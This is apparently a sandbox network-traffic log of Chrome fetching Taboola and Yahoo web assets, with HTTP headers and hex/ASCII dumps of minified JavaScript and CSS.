                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC16384INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 43 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 37 35 38 32 29 2c 72 3d 6e 28 38 30 31 32 29 2c 6f 3d 6e 28 34 31 38 35 29 2c 61 3d 6e 28 34 35 37 30 29 2c 6c 3d 6e 28 38 37 37 33 29 2c 73 3d 6e 28 39 39 30 31 29 2c 63 3d 6e 28 34 39 36 36 29 2c 64 3d 6e 28 36 31 39 34 29 2c 75 3d 6e 28 31 35 37 31 29 2c 70 3d 6e 28 35 38 30 30 29 2c 66 3d 6e 28 34 31 34 38 29 2c 6d 3d 21 31 2c 76 3d 22 22 2c 68 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 76 61 72 20 74 3b 69 66 28 68 3d 73 2e 6d 62 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 21 6d 26 26 76 21 3d 3d 68 26 26 21 28 30 2c 75 2e 4d 76 29
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :function(e,t,n){"use strict";n.d(t,{C:function(){return b}});var i=n(7582),r=n(8012),o=n(4185),a=n(4570),l=n(8773),s=n(9901),c=n(4966),d=n(6194),u=n(1571),p=n(5800),f=n(4148),m=!1,v="",h="";function b(e){var t;if(h=s.mb.location.href,!m&&v!==h&&!(0,u.Mv)


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              99192.168.2.451122151.101.1.444431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC724OUTGET /libtrc/static/topics/taboola-browsing-topics.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: cdn.taboola.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: fw3Kbicd2my5+z9kl9P/VJQtPg34VwMHrO2pTF8HPU9ljYdQoK/S8AXq9egyl7cOXSSePbqJzqQ=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 465ANASW2Y06ESF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 13 Feb 2024 13:15:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "8b140f0f0f6e1a0f986cc7d6dfd74d65"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: 4MpQ_aQntJKuJTBB3LGK3B7cfa8k5k0b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 21130
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 19:13:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Served-By: cache-nyc-kteb1890043-NYC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Timer: S1728414821.514442,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: private,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              abp: 21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 61 62 6f 6f 6c 61 20 54 6f 70 69 63 73 20 46 72 61 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 28 61 73 79 6e 63 28 29 3d 3e 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 22 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 22 69 6e 20 64 6f 63 75 6d 65 6e 74 26 26 64 6f 63 75 6d 65 6e 74 2e 66 65 61 74 75 72 65 50 6f 6c 69 63 79 2e 61 6c 6c 6f 77 73 46 65 61 74 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Taboola Topics Frame</title> <script> (async()=>{ var s=document.referrer; if("browsingTopics"in document&&document.featurePolicy.allowsFeatu


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              100192.168.2.45112387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC364OUTGET /aaq/wf/wf-bind-1.1.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC743INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: pPdcpU6Vq+yDro9Ca4YvpksvMcH2RWcpaz7YhB1HZ/v0IgbWaCT71uXtc5RxorlzT6EDZ8juz5M=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: K9TSHPBZP1J588S2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 05 Oct 2024 18:55:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 11 Jan 2022 10:14:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "9fba2531ffa6cb0b4d3d34c56c295495"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: Qyt1s0oNtpHMZryrsEe7nbfplEXvu_oO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 3666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 260301
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 69 6e 64 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 69 6e 64 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-bind",[],t):"object"==typeof exports?exports["wafer-bind"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1066INData Raw: 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 69 3d 72 2e 73 65 6c 65 63 74 6f 72 3b 6f 28 74 68 69 73 2c 74 29 3b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 66 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 75 3d 30 3b 75 3c 66 2e 6c 65 6e 67 74 68 3b 75 2b 2b 29 7b 76 61 72 20 73 3d 66 5b 75 5d 2e 6e 61 6d 65 2e 6d 61 74 63 68 28 70 29 3b 73 26 26 73 5b 31 5d 26 26 61 2e 70 75 73 68 28 73 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7d 76 61 72 20 6c 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ){var r=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},i=r.selector;o(this,t);for(var a=[],f=e.attributes,u=0;u<f.length;u++){var s=f[u].name.match(p);s&&s[1]&&a.push(s[1].toLowerCase())}var l=n(this,(t.__proto__||Object.getPrototypeOf(t)).call


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              101192.168.2.45112487.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC556OUTGET /aaq/c/49c25f5.caas-news_web.min.css HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC731INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: uaQgPJ3E/DF1+SReK9eUmPO9E7tWARNsGTVFMFbZIrq4dZQuSk71uwAyVhtsQcOVd+A2MLNh1SA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: XQ8G4X7SQ7HDKRMG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 07:18:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 30 Sep 2024 09:58:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "87d9f989fbd1fe1f2d06130df2ddd991"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: aU8ACduYgZjiioRZ2bizXDmT9ZTpkbaE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 235662
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 129284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 40 6b 65 79 66 72 61 6d 65 73 20 73 6c 69 64 65 55 70 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 32 30 30 25 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 61 64 68 69 64 65 7b 30 25 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 74 6f 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 68 6f 77 2d 73 75 63 63 65 73 73 2d 6d 65 73 73 61 67 65 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 70 78 29 7d 38 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 6f 70 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: @keyframes slideUp{0%{transform:translateY(200%)}to{transform:translateY(0)}}@keyframes adhide{0%{visibility:visible}to{visibility:hidden}}@keyframes show-success-message{0%{opacity:0;transform:translateY(10px)}80%{opacity:1;transform:translateY(0)}to{opa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 3a 66 61 6c 6c 62 61 63 6b 7d 2e 63 61 61 73 7b 66 6f 6e 74 3a 31 33 70 78 2f 31 2e 36 22 59 61 68 6f 6f 53 61 6e 73 20 56 46 22 2c 59 61 68 6f 6f 20 53 61 6e 73 2c 59 61 68 6f 6f 53 61 6e 73 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 64 69 73 70 6c 61 79 3a 66 6c 6f 77 2d 72 6f 6f 74 3b 7a 6f 6f 6d 3a 31 7d 2e 63 61 61 73 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 36 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 66 6f 6e 74 2d 73 74 72 65 74 63 68 3a 6e 6f 72 6d 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :fallback}.caas{font:13px/1.6"YahooSans VF",Yahoo Sans,YahooSans,"Helvetica Neue",Helvetica,Arial,sans-serif;background:#fff;word-wrap:break-word;display:flow-root;zoom:1}.caas h1{font-size:2.46em;line-height:1.25;margin:0;color:#232a31;font-stretch:norma
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 69 6e 3a 34 30 70 78 20 30 3b 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 7d 2e 63 61 61 73 2d 61 64 73 2d 73 6c 6f 74 2d 72 61 70 69 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 2a 63 6c 69 70 3a 72 65 63 74 28 31 70 78 20 31 70 78 20 31 70 78 20 31 70 78 29 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 61 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: in:40px 0;color:#e0e4e9}.caas-ads-slot-rapid{text-decoration:none;pointer-events:none;position:absolute!important;*clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);padding:0!important;border:0!important;height:1px!important;width:1px!important}.caas
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 20 2e 63 61 61 73 2d 74 6f 63 2d 73 75 62 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 2c 2e 63 61 61 73 20 2e 63 61 61 73 2d 74 6f 63 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 61 73 2d 74 6f 63 2d 73 75 62 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 6e 6f 2d 68 65 61 64 69 6e 67 7b 6f 70 61 63 69 74 79 3a 31 30 30 25 7d 2e 63 61 61 73 20 2e 63 61 61 73 2d 74 6f 63 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 61 73 2d 74 6f 63 2d 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 3a 3a 62 65 66 6f 72 65 2c 2e 63 61 61 73 20 2e 63 61 61 73 2d 74 6f 63 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 61 61 73 2d 74 6f 63 2d 73 75 62 68 65 61 64 69 6e 67 2d 6c 69 6e 6b 2e 61 63 74 69 76 65 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .caas-toc-subheading-link.active,.caas .caas-toc-container .caas-toc-subheading-link.no-heading{opacity:100%}.caas .caas-toc-container .caas-toc-heading-link.active::before,.caas .caas-toc-container .caas-toc-subheading-link.active::before{content:"";pos
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 29 7b 6f 75 74 6c 69 6e 65 3a 30 7d 2e 63 61 61 73 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 2c 61 2e 63 61 61 73 2d 62 75 74 74 6f 6e 3a 61 63 74 69 76 65 7b 6f 75 74 6c 69 6e 65 3a 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 33 61 62 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 61 62 63 7d 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 2c 61 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 7b 62 6f 72 64 65 72 3a 30 7d 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 3a 6e 6f 74 28 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 29 2c 61 2e 63 61 61 73 2d 62 75 74 74 6f 6e 2e 6e 6f 62 6f 72 64 65 72 3a 6e 6f 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: :focus-visible){outline:0}.caas-button:active,a.caas-button:active{outline:0;text-decoration:none;color:#003abc;border-color:#003abc}.caas-button.noborder,a.caas-button.noborder{border:0}.caas-button.noborder:not(:focus-visible),a.caas-button.noborder:not
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:41 UTC1300INData Raw: 65 6c 61 74 69 76 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 6e 6f 68 65 69 67 68 74 29 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 2d 35 30 25 29 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6e 6f 68 65 69 67 68 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6e 6f 68 65 69 67 68 74 20 2e 63 61 61 73 2d 69 6d 67 7b 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 7d 2e 63 61 61 73 2d 69 6d 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 63 61 61 73 2d 69
